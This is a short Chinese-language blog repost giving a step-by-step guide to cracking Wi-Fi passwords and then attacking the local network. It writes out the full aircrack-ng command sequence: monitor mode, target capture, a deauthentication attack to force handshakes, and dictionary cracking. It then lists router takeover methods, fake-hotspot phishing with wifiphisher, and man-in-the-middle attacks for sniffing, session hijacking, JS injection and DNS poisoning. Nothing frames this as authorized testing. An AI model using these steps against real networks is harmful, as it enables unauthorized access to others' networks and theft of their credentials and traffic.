wifi破解到局域网渗透

本文转自 _博客

一，密码破解

wifi破解最主要的仍是抓握手包破解（不要给我说某某钥匙的“分享”）。

wifi认证主要分为四步：

1,无线客户端与ap链接时，首先发送一个认证请求包

2,ap收到请求后发送一段信息给客户端

3,客户端将信息加密后交给ap

4,ap检查加密结果是否正确，正确则链接，反之否。

破解步骤（以aircrack-ng为例子）：

1,将无线网卡打开至监听模式：

airmon-ng start wlan0

2,探测无线网络：

airodump-ng mon0

3,选择要破解的路由器

airodump-ng -c 信道号 –bssid ap的mac -w 保存的包名 mon0

4,发送deauth攻击，使客户端断开ap，而后自动重连，方便抓取握手包

aireplay-ng -0 10 -a ap的mac -c 客户端的mac –ignore-negative-one mon0

5,破解

aircrack-ng -w 字典 以前保存的包名

也能够使用fern-wifi-cracker这个python写的图形化傻瓜式一键破解工具。

二，局域网渗透

1,仍是路由器

知道了wifi密码还不够，还须要获得拨号账号密码。

a)默认的账号密码

b)路由器漏洞 routerpwn

c)基础认证钓鱼 http://www.qq2b.net/archives/213.html
wifiphiser ：伪造热点，而且弹出一个路由器升级提示页面，让你输入密码

2,中间人攻击

局域网不用像内网域渗透那样当心翼翼

1）dsploit,cain,ettercap等工具

注入js钓鱼，嗅探密码，下载替换，会话劫持，dns毒化等等配合社工效果更佳。特别细化dns毒化+set工具包的站点克隆。